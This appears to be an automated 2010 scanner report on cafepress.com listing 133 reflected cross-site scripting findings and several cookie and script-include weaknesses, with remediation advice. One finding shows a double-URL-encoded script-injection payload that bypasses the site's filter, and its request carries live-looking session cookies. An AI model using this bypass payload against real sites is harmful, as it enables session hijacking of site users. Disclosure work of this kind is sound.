cafepress.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86 Cross Site Scripting in cafepress.com | Vulnerability Crawler Report Report generated by XSS.CX at Mon Dec 27 10:38:41 CST 2010.
Contents
1. Cross-site scripting (reflected)
1.1. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [REST URL parameter 1]
1.2. http://www.cafepress.com/ [cp-v cookie]
1.3. http://www.cafepress.com/ [cp_st cookie]
1.4. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp-v cookie]
1.5. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp_st cookie]
1.6. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp-v cookie]
1.7. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp_st cookie]
1.8. http://www.cafepress.com/+aprons [cp-v cookie]
1.9. http://www.cafepress.com/+aprons [cp_st cookie]
1.10. http://www.cafepress.com/+baby-blanket [cp-v cookie]
1.11. http://www.cafepress.com/+baby-blanket [cp_st cookie]
1.12. http://www.cafepress.com/+baby-bodysuits [cp-v cookie]
1.13. http://www.cafepress.com/+baby-bodysuits [cp_st cookie]
1.14. http://www.cafepress.com/+baby-hat [cp-v cookie]
1.15. http://www.cafepress.com/+baby-hat [cp_st cookie]
1.16. http://www.cafepress.com/+bags [cp-v cookie]
1.17. http://www.cafepress.com/+bags [cp_st cookie]
1.18. http://www.cafepress.com/+boxers [cp-v cookie]
1.19. http://www.cafepress.com/+boxers [cp_st cookie]
1.20. http://www.cafepress.com/+bumper-stickers [cp-v cookie]
1.21. http://www.cafepress.com/+bumper-stickers [cp_st cookie]
1.22. http://www.cafepress.com/+buttons [cp-v cookie]
1.23. http://www.cafepress.com/+buttons [cp_st cookie]
1.24. http://www.cafepress.com/+calendars [cp-v cookie]
1.25. http://www.cafepress.com/+calendars [cp_st cookie]
1.26. http://www.cafepress.com/+clocks [cp-v cookie]
1.27. http://www.cafepress.com/+clocks [cp_st cookie]
1.28. http://www.cafepress.com/+coasters [cp-v cookie]
1.29. http://www.cafepress.com/+coasters [cp_st cookie]
1.30. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp-v cookie]
1.31. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp_st cookie]
1.32. http://www.cafepress.com/+framed-prints [cp-v cookie]
1.33. http://www.cafepress.com/+framed-prints [cp_st cookie]
1.34. http://www.cafepress.com/+greeting_cards [cp-v cookie]
1.35. http://www.cafepress.com/+greeting_cards [cp_st cookie]
1.36. http://www.cafepress.com/+hats-caps [cp-v cookie]
1.37. http://www.cafepress.com/+hats-caps [cp_st cookie]
1.38. http://www.cafepress.com/+ipad-cases [cp-v cookie]
1.39. http://www.cafepress.com/+ipad-cases [cp_st cookie]
1.40. http://www.cafepress.com/+iphone-cases [cp-v cookie]
1.41. http://www.cafepress.com/+iphone-cases [cp_st cookie]
1.42. http://www.cafepress.com/+journals [cp-v cookie]
1.43. http://www.cafepress.com/+journals [cp_st cookie]
1.44. http://www.cafepress.com/+keepsake_boxes [cp-v cookie]
1.45. http://www.cafepress.com/+keepsake_boxes [cp_st cookie]
1.46. http://www.cafepress.com/+license_plate_frames [cp-v cookie]
1.47. http://www.cafepress.com/+license_plate_frames [cp_st cookie]
1.48. http://www.cafepress.com/+magnets [cp-v cookie]
1.49. http://www.cafepress.com/+magnets [cp_st cookie]
1.50. http://www.cafepress.com/+mousepads [cp-v cookie]
1.51. http://www.cafepress.com/+mousepads [cp_st cookie]
1.52. http://www.cafepress.com/+mugs [cp-v cookie]
1.53. http://www.cafepress.com/+mugs [cp_st cookie]
1.54. http://www.cafepress.com/+ornaments [cp-v cookie]
1.55. http://www.cafepress.com/+ornaments [cp_st cookie]
1.56. http://www.cafepress.com/+posters [cp-v cookie]
1.57. http://www.cafepress.com/+posters [cp_st cookie]
1.58. http://www.cafepress.com/+stadium-blanket [cp-v cookie]
1.59. http://www.cafepress.com/+stadium-blanket [cp_st cookie]
1.60. http://www.cafepress.com/+steins [cp-v cookie]
1.61. http://www.cafepress.com/+steins [cp_st cookie]
1.62. http://www.cafepress.com/+stocking [cp-v cookie]
1.63. http://www.cafepress.com/+stocking [cp_st cookie]
1.64. http://www.cafepress.com/+sweatshirts-hoodies [cp-v cookie]
1.65. http://www.cafepress.com/+sweatshirts-hoodies [cp_st cookie]
1.66. http://www.cafepress.com/+thermos [cp-v cookie]
1.67. http://www.cafepress.com/+thermos [cp_st cookie]
1.68. http://www.cafepress.com/+underwear-panties [cp-v cookie]
1.69. http://www.cafepress.com/+underwear-panties [cp_st cookie]
1.70. http://www.cafepress.com/+water-bottles [cp-v cookie]
1.71. http://www.cafepress.com/+water-bottles [cp_st cookie]
1.72. http://www.cafepress.com/+womens-tank-tops [cp-v cookie]
1.73. http://www.cafepress.com/+womens-tank-tops [cp_st cookie]
1.74. http://www.cafepress.com/+womens-thongs [cp-v cookie]
1.75. http://www.cafepress.com/+womens-thongs [cp_st cookie]
1.76. http://www.cafepress.com/+yoga-mats [cp-v cookie]
1.77. http://www.cafepress.com/+yoga-mats [cp_st cookie]
1.78. http://www.cafepress.com/TheGamingApe [cp-v cookie]
1.79. http://www.cafepress.com/TheGamingApe [cp_st cookie]
1.80. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp-v cookie]
1.81. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp_st cookie]
1.82. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp-v cookie]
1.83. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp_st cookie]
1.84. http://www.cafepress.com/cp/info/about/ [cp-v cookie]
1.85. http://www.cafepress.com/cp/info/about/ [cp_st cookie]
1.86. http://www.cafepress.com/cp/info/help/index.aspx [cp-v cookie]
1.87. http://www.cafepress.com/cp/info/help/index.aspx [cp_st cookie]
1.88. http://www.cafepress.com/cp/info/help/tos.aspx [cp-v cookie]
1.89. http://www.cafepress.com/cp/info/help/tos.aspx [cp_st cookie]
1.90. http://www.cafepress.com/cp/info/sell/index.aspx [cp-v cookie]
1.91. http://www.cafepress.com/cp/info/sell/index.aspx [cp_st cookie]
1.92. http://www.cafepress.com/cp/sitemap/ [cp-v cookie]
1.93. http://www.cafepress.com/cp/sitemap/ [cp_st cookie]
1.94. http://www.cafepress.com/cp/viewcart.aspx [cp-v cookie]
1.95. http://www.cafepress.com/cp/viewcart.aspx [cp_st cookie]
1.96. http://www.cafepress.com/make/birth-announcements [cp-v cookie]
1.97. http://www.cafepress.com/make/birth-announcements [cp_st cookie]
1.98. http://www.cafepress.com/make/custom-baby-gear [cp-v cookie]
1.99. http://www.cafepress.com/make/custom-baby-gear [cp_st cookie]
1.100. http://www.cafepress.com/make/custom-buttons [cp-v cookie]
1.101. http://www.cafepress.com/make/custom-buttons [cp_st cookie]
1.102. http://www.cafepress.com/make/custom-hats [cp-v cookie]
1.103. http://www.cafepress.com/make/custom-hats [cp_st cookie]
1.104. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp-v cookie]
1.105. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp_st cookie]
1.106. http://www.cafepress.com/make/custom-ipad-case [cp-v cookie]
1.107. http://www.cafepress.com/make/custom-ipad-case [cp_st cookie]
1.108. http://www.cafepress.com/make/custom-iphone-cases [cp-v cookie]
1.109. http://www.cafepress.com/make/custom-iphone-cases [cp_st cookie]
1.110. http://www.cafepress.com/make/custom-mugs [cp-v cookie]
1.111. http://www.cafepress.com/make/custom-mugs [cp_st cookie]
1.112. http://www.cafepress.com/make/custom-stickers [cp-v cookie]
1.113. http://www.cafepress.com/make/custom-stickers [cp_st cookie]
1.114. http://www.cafepress.com/make/custom-stockings [cp-v cookie]
1.115. http://www.cafepress.com/make/custom-stockings [cp_st cookie]
1.116. http://www.cafepress.com/make/custom-t-shirts [cp-v cookie]
1.117. http://www.cafepress.com/make/custom-t-shirts [cp_st cookie]
1.118. http://www.cafepress.com/make/custom-thermos [cp-v cookie]
1.119. http://www.cafepress.com/make/custom-thermos [cp_st cookie]
1.120. http://www.cafepress.com/make/custom-water-bottles [cp-v cookie]
1.121. http://www.cafepress.com/make/custom-water-bottles [cp_st cookie]
1.122. http://www.cafepress.com/make/holiday-invitations [cp-v cookie]
1.123. http://www.cafepress.com/make/holiday-invitations [cp_st cookie]
1.124. http://www.cafepress.com/make/holiday-photo-cards [cp-v cookie]
1.125. http://www.cafepress.com/make/holiday-photo-cards [cp_st cookie]
1.126. http://www.cafepress.com/make/personalized-gifts [cp-v cookie]
1.127. http://www.cafepress.com/make/personalized-gifts [cp_st cookie]
1.128. http://www.cafepress.com/make/personalized-ornaments [cp-v cookie]
1.129. http://www.cafepress.com/make/personalized-ornaments [cp_st cookie]
1.130. http://www.cafepress.com/make/photo-on-canvas [cp-v cookie]
1.131. http://www.cafepress.com/make/photo-on-canvas [cp_st cookie]
1.132. http://www.cafepress.com/sk/TheGamingApe [cp-v cookie]
1.133. http://www.cafepress.com/sk/TheGamingApe [cp_st cookie]
2. Cookie scoped to parent domain
2.1. http://www.cafepress.com/
2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
2.5. http://www.cafepress.com/+aprons
2.6. http://www.cafepress.com/+baby-blanket
2.7. http://www.cafepress.com/+baby-bodysuits
2.8. http://www.cafepress.com/+baby-hat
2.9. http://www.cafepress.com/+bags
2.10. http://www.cafepress.com/+boxers
2.11. http://www.cafepress.com/+bumper-stickers
2.12. http://www.cafepress.com/+buttons
2.13. http://www.cafepress.com/+calendars
2.14. http://www.cafepress.com/+clocks
2.15. http://www.cafepress.com/+coasters
2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
2.17. http://www.cafepress.com/+framed-prints
2.18. http://www.cafepress.com/+greeting_cards
2.19. http://www.cafepress.com/+hats-caps
2.20. http://www.cafepress.com/+ipad-cases
2.21. http://www.cafepress.com/+iphone-cases
2.22. http://www.cafepress.com/+journals
2.23. http://www.cafepress.com/+keepsake_boxes
2.24. http://www.cafepress.com/+license_plate_frames
2.25. http://www.cafepress.com/+magnets
2.26. http://www.cafepress.com/+mousepads
2.27. http://www.cafepress.com/+mugs
2.28. http://www.cafepress.com/+ornaments
2.29. http://www.cafepress.com/+posters
2.30. http://www.cafepress.com/+stadium-blanket
2.31. http://www.cafepress.com/+steins
2.32. http://www.cafepress.com/+stocking
2.33. http://www.cafepress.com/+sweatshirts-hoodies
2.34. http://www.cafepress.com/+thermos
2.35. http://www.cafepress.com/+underwear-panties
2.36. http://www.cafepress.com/+water-bottles
2.37. http://www.cafepress.com/+womens-tank-tops
2.38. http://www.cafepress.com/+womens-thongs
2.39. http://www.cafepress.com/+yoga-mats
2.40. http://www.cafepress.com/TheGamingApe
2.41. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx
2.42. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx
2.43. http://www.cafepress.com/cp/info/about/
2.44. http://www.cafepress.com/cp/info/help/
2.45. http://www.cafepress.com/cp/info/help/index.aspx
2.46. http://www.cafepress.com/cp/info/sell/index.aspx
2.47. http://www.cafepress.com/cp/moredetails.aspx
2.48. http://www.cafepress.com/cp/products/
2.49. http://www.cafepress.com/cp/sitemap/
2.50. http://www.cafepress.com/cp/tags/
2.51. http://www.cafepress.com/cp/viewcart.aspx
2.52. http://www.cafepress.com/make/birth-announcements
2.53. http://www.cafepress.com/make/custom-baby-gear
2.54. http://www.cafepress.com/make/custom-buttons
2.55. http://www.cafepress.com/make/custom-hats
2.56. http://www.cafepress.com/make/custom-hoodies-sweatshirts
2.57. http://www.cafepress.com/make/custom-ipad-case
2.58. http://www.cafepress.com/make/custom-iphone-cases
2.59. http://www.cafepress.com/make/custom-mugs
2.60. http://www.cafepress.com/make/custom-stickers
2.61. http://www.cafepress.com/make/custom-stockings
2.62. http://www.cafepress.com/make/custom-t-shirts
2.63. http://www.cafepress.com/make/custom-thermos
2.64. http://www.cafepress.com/make/custom-water-bottles
2.65. http://www.cafepress.com/make/holiday-invitations
2.66. http://www.cafepress.com/make/holiday-photo-cards
2.67. http://www.cafepress.com/make/makeacard.aspx
2.68. http://www.cafepress.com/make/personalized-gifts
2.69. http://www.cafepress.com/make/personalized-ornaments
2.70. http://www.cafepress.com/sk/TheGamingApe
3. Cookie without HttpOnly flag set
3.1. http://www.cafepress.com/
3.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
3.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
3.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
3.5. http://www.cafepress.com/+aprons
3.6. http://www.cafepress.com/+baby-blanket
3.7. http://www.cafepress.com/+baby-bodysuits
3.8. http://www.cafepress.com/+baby-hat
3.9. http://www.cafepress.com/+bags
3.10. http://www.cafepress.com/+boxers
3.11. http://www.cafepress.com/+bumper-stickers
3.12. http://www.cafepress.com/+buttons
3.13. http://www.cafepress.com/+calendars
3.14. http://www.cafepress.com/+clocks
3.15. http://www.cafepress.com/+coasters
3.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
3.17. http://www.cafepress.com/+framed-prints
3.18. http://www.cafepress.com/+greeting_cards
3.19. http://www.cafepress.com/+hats-caps
3.20. http://www.cafepress.com/+ipad-cases
3.21. http://www.cafepress.com/+iphone-cases
3.22. http://www.cafepress.com/+journals
3.23. http://www.cafepress.com/+keepsake_boxes
3.24. http://www.cafepress.com/+license_plate_frames
3.25. http://www.cafepress.com/+magnets
3.26. http://www.cafepress.com/+mousepads
3.27. http://www.cafepress.com/+mugs
3.28. http://www.cafepress.com/+ornaments
3.29. http://www.cafepress.com/+posters
3.30. http://www.cafepress.com/+stadium-blanket
3.31. http://www.cafepress.com/+steins
3.32. http://www.cafepress.com/+stocking
3.33. http://www.cafepress.com/+sweatshirts-hoodies
3.34. http://www.cafepress.com/+thermos
3.35. http://www.cafepress.com/+underwear-panties
3.36. http://www.cafepress.com/+water-bottles
3.37. http://www.cafepress.com/+womens-tank-tops
3.38. http://www.cafepress.com/+womens-thongs
3.39. http://www.cafepress.com/+yoga-mats
3.40. http://www.cafepress.com/1/1/index1.html
3.41. http://www.cafepress.com/1/1/indexd1.html
3.42. http://www.cafepress.com/1/3/index1.html
3.43. http://www.cafepress.com/1/3/indexb1.html
3.44. http://www.cafepress.com/1/3/indexc1.html
3.45. http://www.cafepress.com/TheGamingApe
3.46. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx
3.47. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx
3.48. http://www.cafepress.com/cp/info/about/
3.49. http://www.cafepress.com/cp/info/help/
3.50. http://www.cafepress.com/cp/info/help/index.aspx
3.51. http://www.cafepress.com/cp/info/sell/index.aspx
3.52. http://www.cafepress.com/cp/moredetails.aspx
3.53. http://www.cafepress.com/cp/products/
3.54. http://www.cafepress.com/cp/sitemap/
3.55. http://www.cafepress.com/cp/tags/
3.56. http://www.cafepress.com/cp/viewcart.aspx
3.57. http://www.cafepress.com/make/birth-announcements
3.58. http://www.cafepress.com/make/custom-baby-gear
3.59. http://www.cafepress.com/make/custom-buttons
3.60. http://www.cafepress.com/make/custom-hats
3.61. http://www.cafepress.com/make/custom-hoodies-sweatshirts
3.62. http://www.cafepress.com/make/custom-ipad-case
3.63. http://www.cafepress.com/make/custom-iphone-cases
3.64. http://www.cafepress.com/make/custom-mugs
3.65. http://www.cafepress.com/make/custom-stickers
3.66. http://www.cafepress.com/make/custom-stockings
3.67. http://www.cafepress.com/make/custom-t-shirts
3.68. http://www.cafepress.com/make/custom-thermos
3.69. http://www.cafepress.com/make/custom-water-bottles
3.70. http://www.cafepress.com/make/holiday-invitations
3.71. http://www.cafepress.com/make/holiday-photo-cards
3.72. http://www.cafepress.com/make/makeacard.aspx
3.73. http://www.cafepress.com/make/personalized-gifts
3.74. http://www.cafepress.com/make/personalized-ornaments
3.75. http://www.cafepress.com/sk/TheGamingApe
3.76. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
4. Cross-domain Referer leakage
4.1. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
4.2. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
4.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
4.4. http://www.cafepress.com/cp/info/help/index.aspx
4.5. http://www.cafepress.com/cp/info/sell/index.aspx
4.6. http://www.cafepress.com/cp/moredetails.aspx
4.7. http://www.cafepress.com/cp/viewcart.aspx
5. Cross-domain script include
5.1. http://www.cafepress.com/
5.2. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
5.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
5.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
5.5. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
5.6. http://www.cafepress.com/+aprons
5.7. http://www.cafepress.com/+baby-blanket
5.8. http://www.cafepress.com/+baby-bodysuits
5.9. http://www.cafepress.com/+baby-hat
5.10. http://www.cafepress.com/+bags
5.11. http://www.cafepress.com/+boxers
5.12. http://www.cafepress.com/+bumper-stickers
5.13. http://www.cafepress.com/+buttons
5.14. http://www.cafepress.com/+calendars
5.15. http://www.cafepress.com/+clocks
5.16. http://www.cafepress.com/+coasters
5.17. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
5.18. http://www.cafepress.com/+framed-prints
5.19. http://www.cafepress.com/+greeting_cards
5.20. http://www.cafepress.com/+hats-caps
5.21. http://www.cafepress.com/+ipad-cases
5.22. http://www.cafepress.com/+iphone-cases
5.23. http://www.cafepress.com/+journals
5.24. http://www.cafepress.com/+keepsake_boxes
5.25. http://www.cafepress.com/+license_plate_frames
5.26. http://www.cafepress.com/+magnets
5.27. http://www.cafepress.com/+mousepads
5.28. http://www.cafepress.com/+mugs
5.29. http://www.cafepress.com/+ornaments
5.30. http://www.cafepress.com/+posters
5.31. http://www.cafepress.com/+stadium-blanket
5.32. http://www.cafepress.com/+steins
5.33. http://www.cafepress.com/+stocking
5.34. http://www.cafepress.com/+sweatshirts-hoodies
5.35. http://www.cafepress.com/+thermos
5.36. http://www.cafepress.com/+underwear-panties
5.37. http://www.cafepress.com/+water-bottles
5.38. http://www.cafepress.com/+womens-tank-tops
5.39. http://www.cafepress.com/+womens-thongs
5.40. http://www.cafepress.com/+yoga-mats
5.41. http://www.cafepress.com/1/1/index1.html
5.42. http://www.cafepress.com/1/1/indexd1.html
5.43. http://www.cafepress.com/1/3/index1.html
5.44. http://www.cafepress.com/1/3/indexb1.html
5.45. http://www.cafepress.com/1/3/indexc1.html
5.46. http://www.cafepress.com/cp/info/about/
5.47. http://www.cafepress.com/cp/info/help/index.aspx
5.48. http://www.cafepress.com/cp/info/sell/index.aspx
5.49. http://www.cafepress.com/cp/moredetails.aspx
5.50. http://www.cafepress.com/cp/sitemap/
5.51. http://www.cafepress.com/cp/viewcart.aspx
5.52. http://www.cafepress.com/cp/viewcart.aspx
5.53. http://www.cafepress.com/make/birth-announcements
5.54. http://www.cafepress.com/make/custom-baby-gear
5.55. http://www.cafepress.com/make/custom-buttons
5.56. http://www.cafepress.com/make/custom-hats
5.57. http://www.cafepress.com/make/custom-hoodies-sweatshirts
5.58. http://www.cafepress.com/make/custom-ipad-case
5.59. http://www.cafepress.com/make/custom-iphone-cases
5.60. http://www.cafepress.com/make/custom-mugs
5.61. http://www.cafepress.com/make/custom-stickers
5.62. http://www.cafepress.com/make/custom-stockings
5.63. http://www.cafepress.com/make/custom-t-shirts
5.64. http://www.cafepress.com/make/custom-thermos
5.65. http://www.cafepress.com/make/custom-water-bottles
5.66. http://www.cafepress.com/make/holiday-invitations
5.67. http://www.cafepress.com/make/holiday-photo-cards
5.68. http://www.cafepress.com/make/personalized-gifts
5.69. http://www.cafepress.com/make/personalized-ornaments
5.70. http://www.cafepress.com/sk/TheGamingApe
6. Email addresses disclosed
6.1. http://www.cafepress.com/TheGamingApe
6.2. http://www.cafepress.com/make/custom-baby-gear
6.3. http://www.cafepress.com/make/custom-buttons
6.4. http://www.cafepress.com/make/custom-ipad-case
6.5. http://www.cafepress.com/make/custom-iphone-cases
6.6. http://www.cafepress.com/make/custom-stickers
6.7. http://www.cafepress.com/make/custom-stockings
6.8. http://www.cafepress.com/make/custom-thermos
6.9. http://www.cafepress.com/make/custom-water-bottles
6.10. http://www.cafepress.com/make/personalized-gifts
6.11. http://www.cafepress.com/make/personalized-ornaments
7. HTML does not specify charset
8. Content type incorrectly stated
1. Cross-site scripting (reflected)
There are 133 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. 
Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [REST URL parameter 1]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741 was submitted in the REST URL parameter 1. This input was echoed as 2ebb4</script><script>alert(1)</script>df6f6b5b741 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,2990075362ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741 ?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; 
s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 ntCoent-Length: 43454 Date: Sun, 26 Dec 2010 13:47:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:47:13 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:47:13 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 43454 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... afepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,2990075362ebb4</script><script>alert(1)</script>df6f6b5b741 ' window.cafepress.tealeaf.searchTerm = '' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' 